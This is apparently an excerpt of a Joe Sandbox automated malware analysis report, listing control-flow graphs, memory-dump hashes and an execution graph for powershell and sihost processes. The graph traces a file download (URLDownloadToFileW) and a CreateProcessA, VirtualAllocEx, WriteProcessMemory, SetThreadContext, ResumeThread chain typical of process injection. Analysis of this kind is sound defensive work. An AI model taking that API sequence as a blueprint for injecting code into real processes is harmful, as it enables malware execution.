                                      • Source File: 00000007.00000002.460232288.000007FE89500000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89500000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0c6$V
                                      • API String ID: 0-3647031354
                                      • Opcode ID: 5f4cde7c366750c12b9d919b11ed2912485beed1738d07610dcb08f127f1b2b8
                                      • Instruction ID: a944170b096c8b88ec5ca3606d246278336d375ab3f5647e1b1a7c372eb0ed9b
                                      • Opcode Fuzzy Hash: 5f4cde7c366750c12b9d919b11ed2912485beed1738d07610dcb08f127f1b2b8
                                      • Instruction Fuzzy Hash: 77D1043190E7C91FE3479738AC156B67FA4EF87260F1901EBD48DCB0A3D614A956C3A2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 206 7fe89508549-7fe895085f9 207 7fe895085ff-7fe89508609 206->207 208 7fe89508add-7fe89508b96 206->208 209 7fe89508622-7fe89508629 207->209 210 7fe8950860b-7fe89508618 207->210 212 7fe89508640 209->212 213 7fe8950862b-7fe8950863e 209->213 210->209 211 7fe8950861a-7fe89508620 210->211 211->209 215 7fe89508642-7fe89508644 212->215 213->215 217 7fe89508a58-7fe89508a62 215->217 218 7fe8950864a-7fe89508656 215->218 221 7fe89508a75-7fe89508a85 217->221 222 7fe89508a64-7fe89508a74 217->222 218->208 220 7fe8950865c-7fe89508666 218->220 223 7fe89508682-7fe89508692 220->223 224 7fe89508668-7fe89508675 220->224 226 7fe89508a92-7fe89508adc 221->226 227 7fe89508a87-7fe89508a8b 221->227 223->217 232 7fe89508698-7fe895086cc 223->232 224->223 228 7fe89508677-7fe89508680 224->228 227->226 228->223 232->217 238 7fe895086d2-7fe895086de 232->238 238->208 239 7fe895086e4-7fe895086ee 238->239 240 7fe895086f0-7fe895086fd 239->240 241 7fe89508707-7fe8950870c 239->241 240->241 242 7fe895086ff-7fe89508705 240->242 241->217 243 7fe89508712-7fe89508717 241->243 242->241 243->217 244 7fe8950871d-7fe89508722 243->244 244->217 246 7fe89508728-7fe89508737 244->246 247 7fe89508747 246->247 248 7fe89508739-7fe89508743 246->248 251 7fe8950874c-7fe89508759 247->251 249 7fe89508763-7fe895087ee 248->249 250 7fe89508745 248->250 258 7fe895087f0-7fe895087fb 249->258 259 7fe89508802-7fe89508824 249->259 250->251 251->249 252 7fe8950875b-7fe89508761 251->252 252->249 258->259 260 7fe89508834 259->260 261 7fe89508826-7fe89508830 259->261 264 7fe89508839-7fe89508846 260->264 262 7fe89508850-7fe895088de 261->262 263 7fe89508832 261->263 271 7fe895088e0-7fe895088eb 262->271 272 7fe895088f2-7fe89508910 262->272 263->264 264->262 265 7fe89508848-7fe8950884e 264->265 265->262 271->272 273 7fe89508920 272->273 274 7fe89508912-7fe8950891c 272->274 275 7fe89508925-7fe89508933 273->275 276 7fe8950891e 274->276 277 7fe8950893d-7fe895089cd 274->277 275->277 278 7fe89508935-7fe8950893b 275->278 276->275 284 7fe895089cf-7fe895089da 277->284 285 7fe895089e1-7fe89508a3a 277->285 278->277 284->285 288 7fe89508a42-7fe89508a57 285->288
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.460232288.000007FE89500000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89500000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0c6
                                      • API String ID: 0-3394889269
                                      • Opcode ID: 173791408503b5e4b511d799b6dc34c92a099f3d6e98d0e88bc340f35ad35e24
                                      • Instruction ID: dd0019b6d6e76b041b7c1f31924e29b5a9023f4b9fb78f83d6177cc0118f18be
                                      • Opcode Fuzzy Hash: 173791408503b5e4b511d799b6dc34c92a099f3d6e98d0e88bc340f35ad35e24
                                      • Instruction Fuzzy Hash: 8602F63090CB894FD79ADB2C84607297FE2FF9A344F2401EAD58EC72A3C625AC55C751

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 289 7fe89437ae1-7fe89437aef 290 7fe89437af2-7fe89437b05 289->290 291 7fe89437af1 289->291 292 7fe89437b07 290->292 293 7fe89437b08-7fe89437b19 290->293 291->290 292->293 294 7fe89437b1b 293->294 295 7fe89437b1c-7fe89437ba1 293->295 294->295 299 7fe89437ba3-7fe89437ba8 295->299 300 7fe89437bab-7fe89437bb1 295->300 299->300 301 7fe89437bb3-7fe89437bb8 300->301 302 7fe89437bbb-7fe89437bfe URLDownloadToFileW 300->302 301->302 303 7fe89437c00 302->303 304 7fe89437c06-7fe89437c23 302->304 303->304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.457980533.000007FE89430000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89430000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89430000_powershell.jbxd
                                      Similarity
                                      • API ID: DownloadFile
                                      • String ID:
                                      • API String ID: 1407266417-0
                                      • Opcode ID: cd1c528a66c44d560df0ae09aea439479d818ea4fa4a1e4cac3b448f105343c7
                                      • Instruction ID: 255ea0997c72bec08d2a1aedb2daddae76c0246344e9e17e9156d1647c16b188
                                      • Opcode Fuzzy Hash: cd1c528a66c44d560df0ae09aea439479d818ea4fa4a1e4cac3b448f105343c7
                                      • Instruction Fuzzy Hash: B841F87080CB889FD719DB689884BA97BF4FB56325F04426FD08DD3562CB646805C781

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 315 7fe895010d2-7fe895010dc 316 7fe895010de-7fe895010ec 315->316 317 7fe895010ed-7fe89501124 315->317 316->317 318 7fe895011c1-7fe895011cb 317->318 319 7fe8950112a-7fe8950119e 317->319 320 7fe895011d8-7fe895011e8 318->320 321 7fe895011cd-7fe895011d7 318->321 329 7fe895011a6-7fe895011be 319->329 322 7fe895011f5-7fe8950121a 320->322 323 7fe895011ea-7fe895011ee 320->323 323->322 329->318
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.460232288.000007FE89500000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89500000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: xF.
                                      • API String ID: 0-3051270448
                                      • Opcode ID: c56e86e8797893f98d77dafa2354f7e90dae7b28f45637e45efe0b02ac988b36
                                      • Instruction ID: 580774f7347db894d4efb8dac3954d8ca3a8a30fc91633028395e8716d774da0
                                      • Opcode Fuzzy Hash: c56e86e8797893f98d77dafa2354f7e90dae7b28f45637e45efe0b02ac988b36
                                      • Instruction Fuzzy Hash: B041B011A4EBC90FE35B933C28603617FE1DF5B259B2A01EBD48ECB1A3D9095D56C362
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.460232288.000007FE89500000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89500000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0c6$h.4
                                      • API String ID: 0-554142268
                                      • Opcode ID: 6207935340d297e676300fc05cd805bef007439a69ff182d5e15cbd017fd2376
                                      • Instruction ID: 7a497bec5fbcac76306634a857d5c32c68a20d0046abf9d17e1c9e7cd0fe6035
                                      • Opcode Fuzzy Hash: 6207935340d297e676300fc05cd805bef007439a69ff182d5e15cbd017fd2376
                                      • Instruction Fuzzy Hash: 3EA1462090E7C90FD743A77998246A63FF1EF47254F1A01EBD48DCB1B3D629991AC362
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.457980533.000007FE89430000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89430000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89430000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd961ab13d923ce8f9aabe20ec8a43b084586b4c1a13a270ad25fd9d3e929d50
                                      • Instruction ID: dcd518a744f0e8b9e24dbcdaaf9cb6d236bbc38a219752020ac3ad141297a56c
                                      • Opcode Fuzzy Hash: dd961ab13d923ce8f9aabe20ec8a43b084586b4c1a13a270ad25fd9d3e929d50
                                      • Instruction Fuzzy Hash: E131712FF192A15EE201B66DF8C2ADA7B44EF8263770401B7E28C89073E618514A96B4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 465 7fe89503a81-7fe89503a8d 466 7fe89503a8f 465->466 467 7fe89503a90-7fe89503aa1 465->467 466->467 468 7fe89503aa3 467->468 469 7fe89503aa4-7fe89503acc 467->469 468->469 470 7fe89503ace-7fe89503ad4 469->470 471 7fe89503b06-7fe89503b0e 469->471 472 7fe89503b10-7fe89503b2d 470->472 473 7fe89503ad6-7fe89503b04 470->473 471->472 474 7fe89503b2f-7fe89503b42 472->474 475 7fe89503b44 472->475 473->471 476 7fe89503b46-7fe89503b48 474->476 475->476 477 7fe89503b4e-7fe89503b51 476->477 478 7fe89503c28-7fe89503c32 476->478 481 7fe89503b53-7fe89503b66 477->481 482 7fe89503b68 477->482 479 7fe89503c3f-7fe89503c4f 478->479 480 7fe89503c34-7fe89503c3e 478->480 483 7fe89503c51-7fe89503c55 479->483 484 7fe89503c5c-7fe89503c80 479->484 485 7fe89503b6a-7fe89503b6c 481->485 482->485 483->484 485->478 486 7fe89503b72-7fe89503b7f 485->486 487 7fe89503b81-7fe89503b8c 486->487 488 7fe89503b93-7fe89503ba3 486->488 487->488 490 7fe89503ba5-7fe89503bb0 488->490 491 7fe89503bb7-7fe89503be5 488->491 490->491 493 7fe89503c00-7fe89503c10 491->493 494 7fe89503be7-7fe89503bfe 491->494 497 7fe89503c17-7fe89503c27 493->497 494->497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.460232288.000007FE89500000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89500000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: h.4$h.4$h.4$h.4$h.4$h.4
                                      • API String ID: 0-2921988999
                                      • Opcode ID: 014511180938b1da331ca1b66b5574f4e8109193fe5f0ecb1e1792765be3c2b1
                                      • Instruction ID: 83207260039f4ccde732d8185889f0e56e7afb9efb6ec3b5d7b3d104f16bfaa2
                                      • Opcode Fuzzy Hash: 014511180938b1da331ca1b66b5574f4e8109193fe5f0ecb1e1792765be3c2b1
                                      • Instruction Fuzzy Hash: 81610421A0D7CA4FE757933D58606AA7FA1EF87244F1900E7D08DCB0B3D629585AC362

                                      Execution Graph

                                      Execution Coverage:16.6%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:133
                                      Total number of Limit Nodes:14
                                      execution_graph 10947 519ebe 10948 519d59 10947->10948 10949 51a038 10947->10949 10948->10949 10952 51c540 10948->10952 10969 51c532 10948->10969 10953 51c55a 10952->10953 10954 51c562 10953->10954 10986 51cff0 10953->10986 10995 51c9ef 10953->10995 11003 51cbec 10953->11003 11012 51cb2a 10953->11012 11016 51cc08 10953->11016 11020 51cee9 10953->11020 11023 51cac9 10953->11023 11028 51cd67 10953->11028 11034 51ca62 10953->11034 11039 51cc3d 10953->11039 11048 51d3ba 10953->11048 11053 51c9b8 10953->11053 11061 51d016 10953->11061 11074 51c953 10953->11074 10954->10949 10970 51c55a 10969->10970 10971 51c562 10970->10971 10972 51cff0 4 API calls 10970->10972 10973 51c953 4 API calls 10970->10973 10974 51d016 6 API calls 10970->10974 10975 51c9b8 4 API calls 10970->10975 10976 51d3ba 2 API calls 10970->10976 10977 51cc3d 4 API calls 10970->10977 10978 51ca62 2 API calls 10970->10978 10979 51cd67 3 API calls 10970->10979 10980 51cac9 2 API calls 10970->10980 10981 51cee9 VirtualAllocEx 10970->10981 10982 51cc08 WriteProcessMemory 10970->10982 10983 51cb2a WriteProcessMemory 10970->10983 10984 51cbec 4 API calls 10970->10984 10985 51c9ef 4 API calls 10970->10985 10971->10949 10972->10971 10973->10971 10974->10971 10975->10971 10976->10971 10977->10971 10978->10971 10979->10971 10980->10971 10981->10971 10982->10971 10983->10971 10984->10971 10985->10971 10988 51cf6c 10986->10988 10987 51d27e 10987->10954 10988->10987 10989 51ca6e 10988->10989 11082 519130 10988->11082 11086 519138 10988->11086 10990 51ca80 10989->10990 11090 5195e0 10989->11090 11094 5195d8 10989->11094 10990->10954 10996 51c956 10995->10996 11098 519818 10996->11098 11102 51980d 10996->11102 11005 51cbfc 11003->11005 11004 51d27e 11004->10954 11005->11004 11006 51ca6e 11005->11006 11010 519130 ResumeThread 11005->11010 11011 519138 ResumeThread 11005->11011 11007 51ca80 11006->11007 11008 5195e0 ReadProcessMemory 11006->11008 11009 5195d8 ReadProcessMemory 11006->11009 11007->10954 11008->11006 11009->11006 11010->11005 11011->11005 11013 51cb43 11012->11013 11106 519480 11013->11106 11017 51cc11 11016->11017 11019 519480 WriteProcessMemory 11017->11019 11018 51ce12 11019->11018 11110 519358 11020->11110 11024 51ca6e 11023->11024 11025 51ca80 11024->11025 11026 5195e0 ReadProcessMemory 11024->11026 11027 5195d8 ReadProcessMemory 11024->11027 11025->10954 11026->11024 11027->11024 11031 519480 WriteProcessMemory 11028->11031 11029 51ca6e 11030 51ca80 11029->11030 11032 5195e0 ReadProcessMemory 11029->11032 11033 5195d8 ReadProcessMemory 11029->11033 11030->10954 11031->11029 11032->11029 11033->11029 11035 51ca6e 11034->11035 11036 51ca80 11035->11036 11037 5195e0 ReadProcessMemory 11035->11037 11038 5195d8 ReadProcessMemory 11035->11038 11036->10954 11037->11035 11038->11035 11040 51cbfc 11039->11040 11041 51d27e 11040->11041 11042 51ca6e 11040->11042 11046 519130 ResumeThread 11040->11046 11047 519138 ResumeThread 11040->11047 11041->10954 11043 51ca80 11042->11043 11044 5195e0 ReadProcessMemory 11042->11044 11045 5195d8 ReadProcessMemory 11042->11045 11043->10954 11044->11042 11045->11042 11046->11040 11047->11040 11051 5195e0 ReadProcessMemory 11048->11051 11052 5195d8 ReadProcessMemory 11048->11052 11049 51ca6e 11049->11048 11050 51ca80 11049->11050 11050->10954 11051->11049 11052->11049 11054 51c956 11053->11054 11057 519818 CreateProcessA 11054->11057 11058 51980d CreateProcessA 11054->11058 11055 51ca46 11056 51ca80 11055->11056 11059 5195e0 ReadProcessMemory 11055->11059 11060 5195d8 ReadProcessMemory 11055->11060 11056->10954 11057->11055 11058->11055 11059->11055 11060->11055 11062 51d025 11061->11062 11114 519220 11062->11114 11118 519228 11062->11118 11063 51d3a5 11064 51cf6c 11064->11063 11065 51d27e 11064->11065 11066 51ca6e 11064->11066 11072 519130 ResumeThread 11064->11072 11073 519138 ResumeThread 11064->11073 11065->10954 11067 51ca80 11066->11067 11070 5195e0 ReadProcessMemory 11066->11070 11071 5195d8 ReadProcessMemory 11066->11071 11067->10954 11070->11066 11071->11066 11072->11064 11073->11064 11075 51c960 11074->11075 11078 519818 CreateProcessA 11075->11078 11079 51980d CreateProcessA 11075->11079 11076 51ca46 11077 51ca80 11076->11077 11080 5195e0 ReadProcessMemory 11076->11080 11081 5195d8 ReadProcessMemory 11076->11081 11077->10954 11078->11076 11079->11076 11080->11076 11081->11076 11084 519137 ResumeThread 11082->11084 11085 5191ce 11084->11085 11085->10988 11087 51917c ResumeThread 11086->11087 11089 5191ce 11087->11089 11089->10988 11091 51962c ReadProcessMemory 11090->11091 11093 5196aa 11091->11093 11093->10989 11095 51962c ReadProcessMemory 11094->11095 11097 5196aa 11095->11097 11097->10989 11099 51989f CreateProcessA 11098->11099 11101 519afd 11099->11101 11101->11101 11103 51989f CreateProcessA 11102->11103 11105 519afd 11103->11105 11105->11105 11107 5194cc WriteProcessMemory 11106->11107 11109 51956b 11107->11109 11111 51939c VirtualAllocEx 11110->11111 11113 51941a 11111->11113 11115 519271 Wow64SetThreadContext 11114->11115 11117 5192ef 11115->11117 11117->11064 11119 519271 Wow64SetThreadContext 11118->11119 11121 5192ef 11119->11121 11121->11064

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 668 459ca8-459ccb 669 459cd2-459d2c call 450e64 668->669 670 459ccd 668->670 674 459d2f 669->674 670->669 675 459d36-459d52 674->675 676 459d54 675->676 677 459d5b-459d5c 675->677 676->674 676->677 678 459ea7-459ebe 676->678 679 459d61-459d7c 676->679 680 459da0-459db5 676->680 681 459ec3-459f33 call 450ed4 676->681 682 459e62-459ea2 676->682 683 459e1d-459e5d 676->683 684 459d7e-459d9e 676->684 685 459dea-459df7 676->685 686 459dba-459dbe 676->686 677->681 678->675 679->675 680->675 702 459f3b-459f45 681->702 682->675 683->675 684->675 698 459e00-459e18 685->698 687 459dd1-459dd8 686->687 688 459dc0-459dcf 686->688 692 459ddf-459de5 687->692 688->692 692->675 698->675
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: :dJ$Tep$Tep
                                      • API String ID: 0-366135230
                                      • Opcode ID: 32e86d5f5d572b29e7f12801e8e77ee750ff0a1f9976ad0ca3149776dd87bdfd
                                      • Instruction ID: 6510ab184aa7edeafbf146078e2d9212cfb584f0e575f1e636351c42141896f8
                                      • Opcode Fuzzy Hash: 32e86d5f5d572b29e7f12801e8e77ee750ff0a1f9976ad0ca3149776dd87bdfd
                                      • Instruction Fuzzy Hash: 7181D674E00218CFDB08CFAAC945ADEFBB2EF89301F24942AD815BB255D7389906CF55

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 831 45c1c8-45c1ed 832 45c1f4-45c23a 831->832 833 45c1ef 831->833 836 45c23d 832->836 833->832 837 45c244-45c260 836->837 838 45c262 837->838 839 45c269-45c26a 837->839 838->836 838->839 840 45c345-45c34e 838->840 841 45c4e6-45c4f2 838->841 842 45c306-45c31b 838->842 843 45c5a1-45c5a8 838->843 844 45c420-45c424 838->844 845 45c320-45c326 838->845 846 45c26f-45c294 838->846 847 45c2ef-45c301 838->847 848 45c469-45c475 838->848 849 45c4ca-45c4e1 838->849 850 45c2aa-45c2bc 838->850 851 45c3aa-45c3b6 838->851 852 45c574-45c580 838->852 853 45c296-45c2a8 838->853 854 45c450-45c464 838->854 855 45c3f0-45c3f4 838->855 856 45c493-45c49f 838->856 857 45c3de-45c3eb 838->857 858 45c2be-45c2ea 838->858 859 45c37a-45c37e 838->859 839->843 860 45c361-45c368 840->860 861 45c350-45c35f 840->861 864 45c4f4 841->864 865 45c4f9-45c50f 841->865 842->837 870 45c437-45c43e 844->870 871 45c426-45c435 844->871 884 45c32e-45c340 845->884 846->837 847->837 872 45c477 848->872 873 45c47c-45c48e 848->873 849->837 850->837 866 45c3bd-45c3d9 851->866 867 45c3b8 851->867 874 45c587-45c59c 852->874 875 45c582 852->875 853->837 854->837 868 45c407-45c40e 855->868 869 45c3f6-45c405 855->869 876 45c4a6-45c4c5 856->876 877 45c4a1 856->877 857->837 858->837 862 45c391-45c398 859->862 863 45c380-45c38f 859->863 878 45c36f-45c375 860->878 861->878 879 45c39f-45c3a5 862->879 863->879 864->865 890 45c516-45c52c 865->890 891 45c511 865->891 866->837 867->866 880 45c415-45c41b 868->880 869->880 882 45c445-45c44b 870->882 871->882 872->873 873->837 874->837 875->874 876->837 877->876 878->837 879->837 880->837 882->837 884->837 894 45c533-45c549 890->894 895 45c52e 890->895 891->890 897 45c550-45c56f 894->897 898 45c54b 894->898 895->894 897->837 898->897
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0%p1$0%p1
                                      • API String ID: 0-3740086479
                                      • Opcode ID: 859e6013c79d58fa2294c1425c42fce61c5b30391362135ad529ee8cbf2e7a8c
                                      • Instruction ID: e9b813a3b852bf680a6e422c355b2455bfbc7e049a1eee69fd2dc7d035de38d8
                                      • Opcode Fuzzy Hash: 859e6013c79d58fa2294c1425c42fce61c5b30391362135ad529ee8cbf2e7a8c
                                      • Instruction Fuzzy Hash: AEC11A70E04219DFCB04CF99C5C08AEFBB2FF89301F24856AD415A7215D7389986CF99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Z
                                      • API String ID: 0-1862792848
                                      • Opcode ID: 16ba9e1d287cae4853eff8d324eabe8103453a55a51d2c71b58c08924aa43e30
                                      • Instruction ID: d5b92f33ef3a0a6649e7622c67d4893c3904b5d9b8aed51b0ee1af31a80fa935
                                      • Opcode Fuzzy Hash: 16ba9e1d287cae4853eff8d324eabe8103453a55a51d2c71b58c08924aa43e30
                                      • Instruction Fuzzy Hash: 1D912774E05219DFCB04DF99C8409EEFBB1FB88301F14952AD815B7259D3789A0ACF5A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15cf740367b91458ecc74b30c9125de950973620c6cab2c5c1316eaa6e1028f0
                                      • Instruction ID: 9a65f97f485df6383590f9750efafb315bafba6378df428ad1bc137f4effcf20
                                      • Opcode Fuzzy Hash: 15cf740367b91458ecc74b30c9125de950973620c6cab2c5c1316eaa6e1028f0
                                      • Instruction Fuzzy Hash: 9641D274E00508EFCB48CFAAD58499DFBF1FF89301B15D0A6D8589B225D735DA15CB09

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4529ef-4529f1 1 4529f6-4529f8 0->1 2 4529f9-4529fe 1->2 3 452a70-452a7f call 452b76 2->3 4 452a00-452a46 2->4 8 452a86 3->8 64 452a52-452a5c 4->64 65 452a48 4->65 10 452a88-452a8b 8->10 11 452a94-452aac 10->11 12 452a8d 10->12 33 452e36 11->33 58 452ab2-452abb 11->58 12->11 14 452d65-452da1 12->14 15 452b86-452b8a 12->15 16 452d02-452d0a 12->16 17 452c8c-452c9f 12->17 18 452d0f-452d22 12->18 19 452d49-452d50 12->19 20 452b28-452b37 12->20 21 452b0b 12->21 22 452e2a-452e33 12->22 23 452dd6-452e00 12->23 24 452e13-452e27 12->24 25 452c3d-452c41 12->25 26 452adb-452adf 12->26 108 452da3-452da9 14->108 109 452db9-452dc3 14->109 27 452bad 15->27 28 452b8c-452b95 15->28 30 452b13-452b16 16->30 17->33 66 452ca5-452cba 17->66 59 452d45-452d47 18->59 60 452d24-452d2e 18->60 19->33 34 452d56-452d60 19->34 67 452b4f-452b5b 20->67 68 452b39-452b3f 20->68 21->30 102 452e02 23->102 103 452e0c-452e11 23->103 35 452c64 25->35 36 452c43-452c4c 25->36 31 452ae1-452aea 26->31 32 452b02 26->32 37 452bb0-452bb4 27->37 38 452b97-452b9a 28->38 39 452b9c-452ba9 28->39 30->20 51 452b18 30->51 43 452af1-452afe 31->43 44 452aec-452aef 31->44 46 452b05 32->46 33->33 34->30 45 452c67-452c87 35->45 48 452c53-452c60 36->48 49 452c4e-452c51 36->49 56 452bd7 37->56 57 452bb6-452bbf 37->57 55 452bab 38->55 39->55 61 452b00 43->61 44->61 45->30 46->21 63 452c62 48->63 49->63 51->14 51->15 51->16 51->17 51->18 51->19 51->20 51->22 51->23 51->24 51->25 55->37 70 452bda-452bde 56->70 71 452bc6-452bd3 57->71 72 452bc1-452bc4 57->72 58->10 59->19 84 452d40 59->84 60->33 75 452d34-452d3b 60->75 61->46 63->45 80 452a81 64->80 81 452a5e-452a6a 64->81 79 452a4d 65->79 100 452cbc-452cc2 66->100 101 452cd8 66->101 91 452b66-452b74 67->91 82 452b41 68->82 83 452b43-452b45 68->83 87 452be0-452be9 70->87 88 452bff 70->88 86 452bd5 71->86 72->86 75->84 89 45299a-45299d 79->89 80->8 81->79 82->67 83->67 84->30 86->70 97 452bf0-452bf3 87->97 98 452beb-452bee 87->98 96 452c02-452c26 88->96 93 4529a6-4529bd 89->93 94 45299f 89->94 91->15 93->89 94->2 94->11 94->15 94->16 94->17 94->18 94->21 94->26 94->93 104 452a6c 94->104 105 4529bf-4529ec 94->105 96->33 127 452c2c-452c38 96->127 106 452bfd 97->106 98->106 111 452cc4-452cc6 100->111 112 452cc8-452cd4 100->112 110 452cda-452cdc 101->110 116 452e07 102->116 103->24 103->116 104->3 105->0 106->96 118 452dad-452daf 108->118 119 452dab 108->119 109->33 120 452dc5-452dd1 109->120 114 452cde-452ce4 110->114 115 452cea-452cfd 110->115 113 452cd6 111->113 112->113 113->110 121 452ce6 114->121 122 452ce8 114->122 115->30 116->30 118->109 119->109 120->30 121->115 122->115 127->30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$XXp$XXp$XXp$XXp$XXp$$p$$p$$p$$p
                                      • API String ID: 0-748399701
                                      • Opcode ID: 904b34b7802d86f6beca8822fbdb1fcd4b5e1bdefd68faff976f558ce6e72117
                                      • Instruction ID: 714e2ed957e4b965bcb1d2fe1a74a78e29edf2563977732abc46db581e5a1ce9
                                      • Opcode Fuzzy Hash: 904b34b7802d86f6beca8822fbdb1fcd4b5e1bdefd68faff976f558ce6e72117
                                      • Instruction Fuzzy Hash: CEB1C730A04244DFCB158F94D645BBEBBB2BB86302F248557DC025B397CBB89C4ADB49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 129 452b76-452b84 131 452b86-452b8a 129->131 132 452b13-452b16 129->132 133 452bad 131->133 134 452b8c-452b95 131->134 135 452b28-452b37 132->135 136 452b18 132->136 137 452bb0-452bb4 133->137 138 452b97-452b9a 134->138 139 452b9c-452ba9 134->139 168 452b4f-452b5b 135->168 169 452b39-452b3f 135->169 136->131 136->135 140 452d65-452da1 136->140 141 452dd6-452e00 136->141 142 452e13-452e27 136->142 143 452d02-452d0a 136->143 144 452c3d-452c41 136->144 145 452c8c-452c9f 136->145 146 452d0f-452d22 136->146 147 452d49-452d50 136->147 148 452e2a-452e33 136->148 150 452bd7 137->150 151 452bb6-452bbf 137->151 149 452bab 138->149 139->149 202 452da3-452da9 140->202 203 452db9-452dc3 140->203 199 452e02 141->199 200 452e0c-452e11 141->200 143->132 154 452c64 144->154 155 452c43-452c4c 144->155 152 452e36 145->152 178 452ca5-452cba 145->178 174 452d45-452d47 146->174 175 452d24-452d2e 146->175 147->152 153 452d56-452d60 147->153 149->137 158 452bda-452bde 150->158 159 452bc6-452bd3 151->159 160 452bc1-452bc4 151->160 152->152 153->132 163 452c67-452c87 154->163 165 452c53-452c60 155->165 166 452c4e-452c51 155->166 172 452be0-452be9 158->172 173 452bff 158->173 171 452bd5 159->171 160->171 163->132 177 452c62 165->177 166->177 190 452b66-452b74 168->190 179 452b41 169->179 180 452b43-452b45 169->180 171->158 183 452bf0-452bf3 172->183 184 452beb-452bee 172->184 182 452c02-452c26 173->182 174->147 189 452d40 174->189 175->152 186 452d34-452d3b 175->186 177->163 197 452cbc-452cc2 178->197 198 452cd8 178->198 179->168 180->168 182->152 211 452c2c-452c38 182->211 192 452bfd 183->192 184->192 186->189 189->132 190->131 192->182 205 452cc4-452cc6 197->205 206 452cc8-452cd4 197->206 204 452cda-452cdc 198->204 210 452e07 199->210 200->142 200->210 212 452dad-452daf 202->212 213 452dab 202->213 203->152 214 452dc5-452dd1 203->214 208 452cde-452ce4 204->208 209 452cea-452cfd 204->209 207 452cd6 205->207 206->207 207->204 215 452ce6 208->215 216 452ce8 208->216 209->132 210->132 211->132 212->203 213->203 214->132 215->209 216->209
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$Tep$XXp$$p$$p$$p$$p$$p$$p
                                      • API String ID: 0-1748866375
                                      • Opcode ID: 92200d69903b5d856d3ade40656a5907b88d46d71a57976fa1569b4847b32cac
                                      • Instruction ID: f1d61a40e38652b3b64bca18052b74a043a79d73a6b01632955ce8fc52d28f61
                                      • Opcode Fuzzy Hash: 92200d69903b5d856d3ade40656a5907b88d46d71a57976fa1569b4847b32cac
                                      • Instruction Fuzzy Hash: CF91A730F00214DFCB198F58D645AAEBBB2BF86302F698157D8016B396DBB4EC46DB45

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
